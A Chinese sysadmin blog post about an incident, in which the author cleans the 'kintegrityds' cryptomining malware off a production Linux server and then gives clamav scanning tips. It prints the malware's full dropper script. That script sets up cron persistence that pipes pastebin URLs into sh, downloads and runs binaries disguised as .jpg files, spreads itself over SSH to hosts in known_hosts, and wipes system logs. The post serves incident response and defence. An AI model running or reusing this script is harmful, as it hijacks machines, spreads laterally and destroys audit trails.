2. 程式人生 > >記一次生產主機中挖礦病毒"kintegrityds"處理過程!

記一次生產主機中挖礦病毒"kintegrityds"處理過程!

阿新 發佈:2019-03-22
scan 告警 and 下載 clamscan linu conn 自動 out

【記一次生產挖礦病毒處理過程】:

可能性:webaap用戶密碼泄露、Jenkins/redis弱口令等。

1、監控到生產主機一直load告警

2、進服務器 top查看進程,發現挖礦病毒進程,此進程持續消耗cpu,kill掉還會自動啟動。
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND

10059 webapp 20 0 43612 9504 0 S 241.0 0.1 5:49.77 /tmp/kintegrityds

3、查看crontab -l
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wDBa7jCQ||wget -q -O- https://pastebin.com/raw/wDBa7jCQ)|sh

4、分析定時任務:
瀏覽器打開:https://pastebin.com/raw/wDBa7jCQ 得到:
(curl -fsSL https://pastebin.com/raw/CBEphEbb||wget -q -O- https://pastebin.com/raw/CBEphEbb)|sed ‘s/\r//‘|sh

xshell執行:
[webapp@vm_0_17_centos ~]$ (curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|sed ‘s/\r//‘

得出腳本文件內容如下:

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/wDBa7jCQ||wget -q -O- https://pastebin.com/raw/wDBa7jCQ)|sh" | crontab -

mkdir -p /tmp
chmod 1777 /tmp

ps -ef|grep -v grep|grep hwlh3wlh44lh|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk ‘{print $2}‘ | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "watchdog"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "watchdogs"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "ksoftirqds"|awk ‘{print $2}‘|xargs kill -9
ps -ef|grep -v grep|grep "suolbcc"|awk ‘{print $2}‘|xargs kill -9
ps aux|grep -v grep|grep -v kintegrityds|awk ‘{if($3>=80.0) print $2}‘|xargs kill -9
apt-get install cron -y||yum install crontabs -y||apk add cron -y

if [ ! -f "/tmp/.X11unix" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl -fsSL http://sowcar.com/t6/686/1553038571x2918527206.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/686/1553038571x2918527206.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
elif [ ${ARCH}x = "i686x" ]; then
(curl -fsSL http://sowcar.com/t6/686/1553038610x2890149536.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/686/1553038610x2890149536.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
else
(curl -fsSL http://sowcar.com/t6/686/1553038610x2890149536.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/686/1553038610x2890149536.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
fi
/tmp/kpsmouseds
elif [ ! -f "/proc/$(cat /tmp/.X11unix)/stat" ]; then
ARCH=$(uname -m)
if [ ${ARCH}x = "x86_64x" ]; then
(curl -fsSL http://sowcar.com/t6/686/1553038571x2918527206.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/686/1553038571x2918527206.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
elif [ ${ARCH}x = "i686x" ]; then
(curl -fsSL http://sowcar.com/t6/686/1553038610x2890149536.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/686/1553038610x2890149536.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
else
(curl -fsSL http://sowcar.com/t6/686/1553038610x2890149536.jpg -o /tmp/kpsmouseds||wget -q http://sowcar.com/t6/686/1553038610x2890149536.jpg -O /tmp/kpsmouseds) && chmod +x /tmp/kpsmouseds
fi
/tmp/kpsmouseds
fi

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h ‘(curl -fsSL https://pastebin.com/raw/wDBa7jCQ||wget -q -O- https://pastebin.com/raw/wDBa7jCQ)|sh >/dev/null 2>&1 &‘ & done
fi

echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron

5、分析腳本內容:
定義環境變量-->把獲取腳本寫進crontab-->創建tmp目錄並修改權限-->排查出其他類型的挖礦病毒進程並幹掉-->強制下載文件到/tmp目錄並賦執行權限-->最後根據密鑰提取主機IP,批量處理 ssh 到主機執行腳本。


6、【解決過程】:root用戶
①、停止定時任務
service crontab stop

執行以下得到IP
grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts

排查以上IP的主機是否感染。

②、root用戶修改/tmp目錄權限755,此時文件屬組為root:root,webapp用戶沒有執行權限,就可以幹掉/tmp/kintegrityds進程了。
drwxr-xr-x 3 root root 12288 Mar 21 16:34 tmp

chmod 755 /tmp

--清空/tmp:
cd /tmp
rm -rf *

###cd /var/spool/cron/
###rm -rf webapp

###webapp清空/tmp:
###cd /tmp
###rm -rf *


③、kill掉此進程:/tmp/kintegrityds

top
10059 webapp 20 0 43612 9504 0 S 241.0 0.1 5:49.77 /tmp/kintegrityds

kill -9 10059

再次top,無此進程:/tmp/kintegrityds


④、crontab -l依然持續寫入*/10 * * * * (curl -fsSL https://pastebin.com/raw/wDBa7jCQ||wget -q -O- https://pastebin.com/raw/wDBa7jCQ)|sh到定時任務,判斷有守護進程。

top -U webapp
23545 webapp 20 0 109928 16532 4 S 0.0 0.1 4:37.53 [kpsmouseds]

發現可疑進程,幹掉,
kill -9 23545

不再持續寫入到定時任務。

⑤、最後修改webapp用戶密碼,修改/tmp文件屬組,啟動crontab,添加常用任務。

passwd webapp

chown -R webapp.webapp /tmp/

###chown -R webapp.webapp /var/spool/cron


/var/spool/cron


【安全防範】:
密鑰文件改別名:id_rsa.pub --> id_rsa.pub_bak_日期
Jenkins和Redis不要用弱口令
保管好主機密碼!


【 Linux殺毒軟件】:clamav
yum install clamav

· 升級病毒庫 freshclam
· 掃描所有用戶的主目錄就使用 clamscan -r /home
· 掃描您計算機上的所有文件並且顯示所有的文件的掃描結果,就使用 clamscan -r /
· 掃描您計算機上的所有文件並且顯示有問題的文件的掃描結果,就使用 clamscan -r --bell -i /
/usr/local/clamav/bin/clamscan -r --remove (查殺當前目錄並刪除感染的文件)
/usr/local/clamav/bin/clamscan -r --bell -i / (掃描所有文件並且顯示有問題的文件的掃描結果)

>其他參數
> -r/--recursive[=yes/no] 所有文件
>  --log=FILE/-l FILE 增加掃描報告
>  # clamscan -l /var/log/clamscan.log /
>  --move [路徑] 移動病毒文件至..
>  --remove [路徑] 刪除病毒文件
>  --quiet 只輸出錯誤消息
>  --infected/-i 只輸出感染文件
>  --suppress-ok-results/-o 跳過掃描OK的文件
>  --bell 掃描到病毒文件發出警報聲音
>  --unzip(unrar) 解壓壓縮文件掃描

--掃描根目錄下文件,並指定日誌文件:/var/log/clamscan.log

clamscan -r -l /var/log/clamscan.log / &

【查看CPU占用排名前十的進程:】
ps aux|head -1;ps aux|grep -v PID|sort -rn -k +3|head

【查看內存占用排名前十進程:】
ps aux|head -1;ps aux|grep -v PID|sort -rn -k +4|head

記一次生產主機中挖礦病毒"kintegrityds"處理過程!

相關推薦

生產主機病毒"kintegrityds"處理過程

scan 告警 and 下載 clamscan linu conn 自動 out 【記一次生產挖礦病毒處理過程】: 可能性:webaap用戶密碼泄露、Jenkins/redis弱口令等。 1、監控到生產主機一直load告警 2、進服務器 top查看進程,發現挖礦病毒進

手動清理Linux病毒

pan fff 殺毒軟件 win10 ado top 根據 部門 enter 時間:2018年5月16日起因:某公司的運維人員在綠盟的IPS上監測到有挖"門羅幣"的惡意事件,受影響的機器為公司的大數據服務器以及其他Linux服務器。我也是趕鴨子上架第一次

服務器被經歷與解決辦法

alt boot 告警 port 下載 被黑 rep $2 nano 記一次服務器被挖礦經歷與解決辦法 在最近的某一天裏面,中午的一個小息過後,突然手機的郵件和公眾號監控zabbix的告警多了起來。我拿起手機一看原來是某臺服務器上的CPU跑滿了,就開始登上去看一下是哪

生產的bug

{} 測試 led 過程 生產 日期 代碼上線 返回 隱藏   第一個在代碼中使用 new SimpleDateFormat("EEEE")來判斷周幾。在本地測試過程中通過日誌打印出來的周幾 比如周日對應的是中文漢字“星期日”,然後使用判斷 if("星期日".equals(

項目遇到的git問題

問題 默認 需求 克隆 git問題 比較 補丁 自然 行合並 前言 因為之前在學校裏面做項目,對git接觸不是太多,項目沒有太多不間斷需求,所以基本上開發時很少有建立比較多的分支,對分支這一塊不熟,導致今天出現了一個問題。 遇到的問題 前幾天做的事 前幾天有做一個需求,是在

服務器被處理解決過程

amp 命令 刪除 root密碼 pos 服務器 exc 感染 oot 內網一臺服務器cpu爆滿,第6感猜測中了挖礦病毒,以下為cpu爆滿監控圖表趕緊ssh進系統,top了下,一個./x3e536747 進程占用了大量的cpu,cpu load average超過了cpu內

生產SQL強勢優化

有關 10.6 3.1 計算 not row 是否 -s 相減   受同事dd之托,優化一條boss看的報表SQL。dd寫復雜疑難SQL無數,如何寫出優雅的SQL自有一番心得體會。能將一條7表含inner join,left join並含有關聯子查詢的、返回結果集340

生產環境thrift服務的配置問題

用戶註冊 連接 數據庫連接 cif none 所有 selectors 請求超時 時間 問題現象 有客戶反饋我們的產品有時反應很慢,處理會出現超時。 問題分析過程 1.第一反應可能是用戶增加,並發量太大了,詢問了運營,最近用戶註冊數據並沒有猛增。 2.分析

解決cmd執行java提示"找不到或無法加載主類"的問題

提示 .com nbsp 大小寫 環境變量 spa 文件中 .exe 輸入 今天遇到一個問題:在cmd命令行中,用javac編譯java文件可以成功,但是用java執行卻提示“找不到或無法加載主類”。現將該問題的原因以及解決辦法記錄一下。 先理解一下系統變量path和cla

生產資料庫"意外"重啟的經歷

前言 在一個陽光明媚的下午,電腦右下角傳來一片片郵件提醒,同時伴隨著微信釘釘的震動,開啟一看,應用各種出錯,天兔告警,資料庫伺服器記憶體爆紅,Mysql資料庫例項掛掉了。 排查 先交代一下資料庫版本: mysql> status -------------- mysql Ver 14.14

對`vulnhub``Android4`靶機滲透測試全過程

記一次對vulnhub中Android4靶機滲透測試全過程 Android4靶機簡介 名稱:Android4 作業系統:Android v4.4 標誌:/data/root/(在此目錄中) 等級:初學者。 搭建成功的Android平臺 知識點 埠掃描和IP發現 使用adb_server_exe

解決cmd執行java提示"找不到或無法載入主類"的問題

今天遇到一個問題:在cmd命令列中,用javac編譯java檔案可以成功,但是用java執行卻提示“找不到或無法載入主類”。現將該問題的原因以及解決辦法記錄一下。 先理解一下系統變數path和classpath的作用。 path:可執行命令的搜尋路徑,在該路徑下搜尋可以執行的程式或批處理檔案。   命令

生產環境物理機磁碟/目錄被日誌打滿處理方式(logrotate失效)

#山東梅長蘇 監控發現物理機/目錄使用率一直100%,messages和secure日誌特別大,應用已無法啟動。logrotate不生效排查了好長時間,原來的處 理方式是logrotate /etc/logrotate.conf加-f強制執行,但這種方式並沒有

【本人禿頂程式設計師】生產資料庫"意外"重啟的經歷

←←←←←←←←←←←← 我都禿頂了,還不點關注! 前言 在一個陽光明媚的下午,電腦右下角傳來一片片郵件提醒,同時伴隨著微信釘釘的震動,開啟一看,應用各種出錯,天兔告警,資料庫伺服器記憶體爆紅,Mysql資料庫例項掛掉了。 排查 先交代一下資料庫版本: mysql&

生產DB2資料庫鎖超時問題的分析與排查

作者介紹 侯君,證通股份有限公司DBA,主要負責DB2、MySQL、Couchbase運維,以及自動化運維平臺開發,Python愛好者。 前言 DB2的鎖管理機制一直為DB2應用開發人員和DBA所詬病。對其鎖機制不理解的直接後果就是導致鎖超時和死鎖的發生。所以監控並分析鎖超時和死鎖,應是每個DB2

spring bootMongoDB Prematurely reached end of stream的異常解決

  在spring boot專案中使用了mongodb,當一段時間沒有操作mongodb,下次操作mongodb時就會出現異常。異常如下: org.springframework.data.mongodb.UncategorizedMongoDbException: Prematurely reached

生產問題--CompletableFuture預設執行緒池

在jdk7中,我們使用執行緒池可能會使用ExecutorService,預設有四種方式Executors.newSingleeThreadPool()Executors.newFixedThreadPool()Executors.newCacheThreadPool()Exe

新人,shiro使用的坑

shiro攔截器,的url-pattern 配什麼都可以就是不能配置為/ 否則會出現,cookie還是tomcat容器的session cookie,無法把session交給shiro管理 同時,如果出現偶爾<shiro;user>標籤生效,重新整理又失效的情

生產環境CPU佔用飆高問題解決

1 問題來源與背景 問題背景,專案對外提供查詢航班艙位介面,對航信黑屏報文做正則解析返回。由於起初對正則不熟悉,對黑屏報文格式規律不清楚,導致寫了大量的長正則表示式,生產環境併發量上來(200/s),直

生產數據庫&quot;意外&quot;重啟的經歷

sort 狀態 process gid kdump hive proto 結合 區別 前言 在一個陽光明媚的下午,電腦右下角傳來一片片郵件提醒,同時伴隨著微信釘釘的震動,打開一看,應用各種出錯,天兔告警,數據庫服務器內存爆紅,Mysql數據庫實例掛掉了。 排查 先交代一下